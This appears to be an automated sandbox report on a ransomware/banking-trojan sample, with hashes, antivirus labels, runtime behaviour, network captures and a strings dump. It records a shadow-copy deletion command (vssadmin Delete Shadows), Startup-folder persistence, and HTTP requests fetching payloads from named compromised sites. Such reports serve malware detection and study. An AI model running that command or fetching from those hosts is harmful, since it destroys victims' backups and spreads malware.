Analysis Date2015-01-18 04:44:32
MD590c4bbc6aee0d0614100bc6e7a118895
SHA1a87d0b00de0b22ee05d8adc2976cacde23078ca5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: e12cf254e3395201807e52a0b95d0540 sha1: 041f267dc6518776aa0e9127f4e9d72ca352b783 size: 20480
Section.rdata md5: a06432b1a35b6eae793fb415cf1e18cd sha1: 42b8b8e5f198a23f60279b5d68f9bb5e83b7ed62 size: 4096
Section.data md5: 6135a006d83d264fc331600c5abf4d6d sha1: 8ac7a712007d73b9cdca8a43b513251086dfcb39 size: 4096
Section.idata md5: d84d23bdaafde87c270661d9705250ad sha1: 1deaa6d62b3ee6a643852851c9c33e8453bd11c7 size: 4096
Section.rsrc md5: 7855e3e64ecdb056c4fc785187d00364 sha1: f3720220b1bf5f0d162e60f545e47b95c1b1c306 size: 221184
Section.reloc md5: 9900d9eb0e3a14bbd2a82ac82a84713e sha1: f80cd284f96feb6ccdb98d8b3fa2aceff58364d3 size: 4096
Timestamp2014-10-30 10:22:19
Pdb path@
PEhashcfcaccf431799fe4111224b43855479920084c44
IMPhash9094b744fd84bfba48ef288178cd12f5
AV360 Safeno_virus
AVAd-AwareTrojan.GenericKD.1959935
AVAlwil (avast)Rootkit-gen [Rtk]
AVArcabit (arcavir)Trojan.GenericKD.1959935
AVAuthentiumW32/Trojan.TNQB-1837
AVAvira (antivir)TR/Rogue.pdba
AVBullGuardTrojan.GenericKD.1959935
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)TrojanDropper.Injector.r6
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.GenericKD.1959935
AVEset (nod32)Win32/Injector.BOWI
AVFortinetW32/BOUR!tr
AVFrisk (f-prot)W32/Trojan3.LXZ
AVF-SecureTrojan.GenericKD.1959935
AVGrisoft (avg)Inject2.BDDW
AVIkarusTrojan-Spy.Zbot
AVK7Unwanted-Program ( 004a8e8a1 )
AVKasperskyTrojan-Dropper.Win32.Injector.kvda
AVMalwareBytesSpyware.Zbot.ED
AVMcafeeGeneric.so
AVMicrosoft Security EssentialsRansom:Win32/Crowti.A
AVMicroWorld (escan)Trojan.GenericKD.1959935
AVRisingno_virus
AVSophosTroj/Wonton-IX
AVSymantecTrojan.Cryptodefense
AVTrend MicroTSPY_ZBOT.YRG
AVVirusBlokAda (vba32)TrojanBanker.Tinba

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\a1a0cab\a1a0cab.exe
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\a1a0cab.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\a1a0cab.exe
Creates Processvssadmin.exe Delete Shadows /All /Quiet
Creates Process-k netsvcs

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdesignbytheme.com
Winsock DNSblog.marianisel.com
Winsock DNSvirachey.com
Winsock DNSfreekidsvideos.net
Winsock DNSbball-keyman.net
Winsock DNSstpaulmaybee.org
Winsock DNSwww.grekiskaforeningen.com
Winsock DNSbethpeters.net
Winsock DNSdanielferris.com.au
Winsock DNSclerktogovernors.co.uk

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSwww.grekiskaforeningen.com
Type: A
193.12.177.238
DNSclerktogovernors.co.uk
Type: A
94.136.40.103
DNSdanielferris.com.au
Type: A
117.55.227.125
DNSstpaulmaybee.org
Type: A
198.23.48.88
DNSbethpeters.net
Type: A
184.154.193.178
DNSblog.marianisel.com
Type: A
70.167.156.65
DNSvirachey.com
Type: A
198.23.48.160
DNSbball-keyman.net
Type: A
112.78.125.236
DNSfreekidsvideos.net
Type: A
DNSdesignbytheme.com
Type: A
HTTP GEThttp://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 193.12.177.238:80
Flows TCP192.168.1.1:1032 ➝ 94.136.40.103:80
Flows TCP192.168.1.1:1033 ➝ 117.55.227.125:80
Flows TCP192.168.1.1:1034 ➝ 198.23.48.88:80
Flows TCP192.168.1.1:1035 ➝ 184.154.193.178:80
Flows TCP192.168.1.1:1036 ➝ 70.167.156.65:80
Flows TCP192.168.1.1:1037 ➝ 198.23.48.160:80
Flows TCP192.168.1.1:1038 ➝ 112.78.125.236:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a6368 650d0a0d 0a         he....che....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x000000c0 (00192)   68650d0a 0d0a6368 650d0a0d 0a         he....che....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a0a 0d0a6368 650d0a0d 0a         ......che....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 650d0a0d 0a         ache....e....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a20 6e6f2d63   o-cache.... no-c
0x000000c0 (00192)   61636865 0d0a0d0a 650d0a0d 0a         ache....e....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a6865 0d0a0d0a 650d0a0d 0a         ..he....e....


Strings
.
.
.
+b
..
.OL+
6m
..
..g
..#
.8
...
f...
].
.@.
F
..

080404b0
1, 0, 0, 1
2, 0, 0, 1
 (C) 2008
Comments
CompanyName
Copyright ? 2014
FileDescription
FileVersion
InternalName
kernel32.dll
LegalCopyright
LegalTrademarks
OriginalFilename
PrivateBuild
ProductName
ProductVersion
SpecialBuild
SpellPicture
 SpellPicture
  SpellPicture
SpellPicture 1.0 
 SpellPicture(&A)...
SpellPicture.exe
StringFileInfo
Translation
VarFileInfo
VS_VERSION5INFO
@$,=^`
%'!`}>
 0$0<0d0h0l0p0t0x0|0
000DqZO
000Dr[O
08/05/14
!%	0dEx
0_h Wyg
0Q$R"Uu
10iP4K
1 1$1(1,1014181h1l1p1t1x1|1
1"1(1.141:1@1F1L1R1X1^1d1j1p1v1|1
1.141M1z1
14r,bs
	}18{2IHA
1HKrO6
=1'J,\"VO/
\_1k2h
1VMuC\
"1wapH
2$2*20262<2B2H2N2T2Z2`2f2l2r2x2~2
222Br[O
2 2$2P2T2l2
}29YiS
2;>B,[
2`;Clk
(2dfv 
2g-D\e
:2;ml@
2>y yy
2<Z=Z#ZF
31]JW>
3 3&3,32383>3D3J3q3~3
3 3$3(3,30343X3\3x3|3
}3IY"s
:#3OtD<
3So<A<T
  3u7qN
?3y4PjB
444DqZP
444Dr^V
444Dtqp
4$4<4T4l4
4'474h4
4J5P5Z5_5
[/4}lLuO
*(^4($]P
52`a`f
5,525C5
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
5 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
5B Kk3
5.e):`
6"6Z6~6
69|.r'
,{6g;{
6m0~FL
///6o\Q
6QzKM2
6_s[l^v
[6Uj09<
6w8 *`{
7%:>45
7$7*70767<7B7H7N7T7Z7`7f7l7r7x7~7
7]d~<6:<
7HVbR~ 
7IRO|L
	'7JxZ
7QEd	8h;
>7Y,c?=
<=7=yw>Q
81q7N8
8/:5:L:Q:W:D;Y;A<
888Dvvv
888Dwww
888Dzzz
8&8_8n8
8	9K=&>
8_c8It_
8,;f,CQ
*=#8P8
\8pldN
8 V8+A
8V"jwF
+8*x@1
8XIl5qD
9,949H9d9l9
(9L9p9
9QNg</<
:`9 ya$u=:
9Zn%Sc
^a&'6l<X
a"9i}),
_acmdln
a_DE5B
_adjust_fdiv
Adobe Fireworks CS4
AgEI +
?ah3pX
a j$+t
a.k]:^
A~KXB'
AP#6Qu
AppendMenuA
Ass#b2b
aTW,*V
,a U*3
aW.1*}
aXO%v$
/@.A$YN
'b5<8,
b^'Blr4
bbPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
 {+_B=I
BiX)G@
$bJrn=
Bl~W[+
bUjqMo6
BVk-HZ]
@~~#\?c
!	c1Mr
C3@E2`
>CCIdd{
cd{0sW"e`
=CIOT4
~/C&Ob
!Coldm+|
_controlfp
c?Or<dk\
C$!(qR"
CreateCompatibleDC
CreateFileW
? Cse`
C:\Users\M\Desktop\vc\SpellPicture\Release\SpellPicture.pdb
cwwE5b
__CxxFrameHandler
$cYxS1J`.
<$<,<@<\<d<
<<<D~~~
<<<D|||
<<<D{{{
';]~D\
D}5c9U9GXX
D`7M-w
D8|sIX)
@d9(ce
@.data
d\az~p
dcvCA60g
[%DE<R^
.dfGo|
__dllonexit
:(:D:L:T:\:p:
]D'Mp.
+dM q;H
dN_LfI
DrawIcon
[DX26>
e4q'g+
e4&w3E
E9|rQz
ef*o|Q
Eg#W'/
@E,Mam5
/EMfuT
`.EmvT
>{{En5
EnableWindow
?EP ;-
eP+/-h
^#er~#
?E&wOW
_except_handler3
eX-VC[
\`E{z~
<_{f"[
fbG-mS
fclose
)fIIK6
f_j<Sa
F+N~e:$V
fpov!@
{fx5|1
G9USht
</!ga8
g|a>:F
gaP'1&q
GBR{l/D
*gce3M
_G-(df|5B
GDI32.dll
GetClientRect
__getmainargs
GetModuleFileNameW
GetModuleHandleA
GetModuleHandleW
GetObjectA
GetProcAddress
GetStartupInfoA
GetSystemMenu
GetSystemMetrics
GetWindowRect
G';)=h
>Gil?B
G&k^#e
g}%L~B
|_GlKD
=gp@,5
g$pVTdX
GpwQ]3{d
g`q<2[
g"Uh>Ir_7
h2=asc
&h4:	+II
hE{\"^
hmG{sO
hp]Q7NwK
hRa.5O
Hraw<4
HrCg@b	g 
h,^(\u
%`*]HW
#[i"[*;
:	;);I;
i2Em1M
I4o3Ew
ia\G[j
I*a#)w]
.idata
I"FQlsC
I[LBd<
I)ms|2<
&-iN;d
_initterm
IsIconic
IwZ?FM
i#YKQJ
|#-(j17l
JI~*eV
Jm+~ag
jPSSSWP
jPVVVSP
JT.o/Ap
	j@}w}M
??j$	z
k5gxbG
~k_<^7
;K8C?U
@.=kDd
k_Dt[4
kernel32.dll
KERNEL32.dll
' Kg1	C
k;i._^
KillTimer
K*')*JR: 
.K=M_e
KRvv\$
k`(tLH;
k{uh96
k/zV#o
L#9<+5x
%Ld*8xVN5
Lg~9{R
lG,usR
l;L1{NCE
ll$p/)
Ll/udG4;Mqa
LoadIconA
LoadImageA
LoadLibraryA
lr}tgT
l$=(wC
%LZ7u#<
}|m&${
$<'m+`
m5rkJll
m@BW#5
MFC42.DLL
}*mGhS
MLIz]B
m^{L;Y
{mM&VVa
MM>ZOL@Cq
m%N1hy2.+L
mO	)~\n+
MSVCRT.dll
|M%Wk^
MX,6*^,
N4|gV%
/N61 {DQ
N8a^Hv
^nA3NB
n_.mWp
N/Og&%
nqY>OW
;N%rbD
Nz<4b}'
%N zE[/
)\)O,=
+O{{0<
o2v?N*]\
OF?}*`p
o?,J/c
Om14ee.
_onexit
-o,W8{plI
;,;@;\;p;
+%P.1/
P[7.MZ
P9ArS^.|
PBe6|JE
__p__commode
p>DdOjoT
__p__fmode
p~,IEi
Pj.*A@
PJZ|K;wab]w
)-p&L0
p]'T<x.l
pT`zbz
puR[b)
@PYExZ
///PYRM
P+z3z)
{q40b>
'Q45z<c
#Q9I[<
!>q-b&}
qdDc,B
QeQ_lVn
QIp:qo
QI`YD+
qkVWbl
QoL'GX
qS3Vz<#GK#0
=`qZh>dX8
qZZWu,E%
RcF:-i
`.rdata
,re3G!
@.reloc
\res\1.bmp
\res\2.bmp
\res\3.bmp
rewind
rH!p	w
%r>Op6
R'U^WNz
RX2A2o
s'0QcU
S66*QZ
sCP_6!7v
S~eiLL0>
SelectObject
SendMessageA
__set_app_type
_setmbcp
SetTimer
__setusermatherr
SgCfCFGL
sirE9v
S ja@%-
^skA@$5
Sl P"|9w
S%=M.Wg
s|.s:m
SSPQRSS
SSS+iiiMuuu]ttt`ttt`ttt`ttt`ttt`ttt`ttt`ttt`rrrb
StretchBlt
'\s<}W
SxSd:m
}%^#T)
t~5I]JS
T`6nV-
!Tcy-~
t(e:qC>
?terminate@@YAXXZ
tEXtCreation Time
tEXtSoftware
!This program cannot be run in DOS mode.
T_\iVJ
t:(jPr
Tlz\jU
t@\M60
T{:[M:g
@{TR90
t'r\D6
!T+$V&M
(t[X#{
?+u1;b
	u9i/a
]	!u$d
u+h.0`{
u_{(jBf
]U!k(e
...,[UO
^uOmEy~M
uOnl\"0I
_UP=B+
UpdateWindow
USER32.dll
u|sRcu
u@T]mz
V2/C|Z
\VBR10Qq
v'"\C)
vcV|"#
vLeHv(-
*V-L~h
V}'{N4QbHI
VVPWWVV
VVWWVV
v>;W-k
VX.8PD
vx91<KO
_w86Qv
~W	BB!@%
$w"bY9
WE,Mp+
_wfopen
wl[fNY
wlho	]
$W#n5@
w")^TA~
WVVVVh
X~:4w&
x67%<$B
_XcptFilter
xf#-<g
xFyU`'E
}:-X@@G
XH~Tt_
/Xmfn&
Xy B+F+I
XYtR/g//
:xZ\H@
&@\[y>
y^..&|
Y1Ov!I7
Y-4r2p
Y@`+5_
!YF@Q*D
Y	?"K,
yNlm+!
yoH\dR
YP[RGp
y])qa{
^YRnMw
_~_Y/s 
Yu=h?qy
Y,/yRO
/y?-\z
Z9.CT<
Z9$ZX9
ZaHg3g
}/Z&)?`C
z%c'[)=(W
Z~DStq
ZDZa(^
ZeY,[u"
z#ez8P
Z_gd=P
zkZ<@^
;Z/n!o
Z)*ocO
zQpo"<
Zr|_+`
Zw%'%D
ZWZe29Z
ZxZ9.TC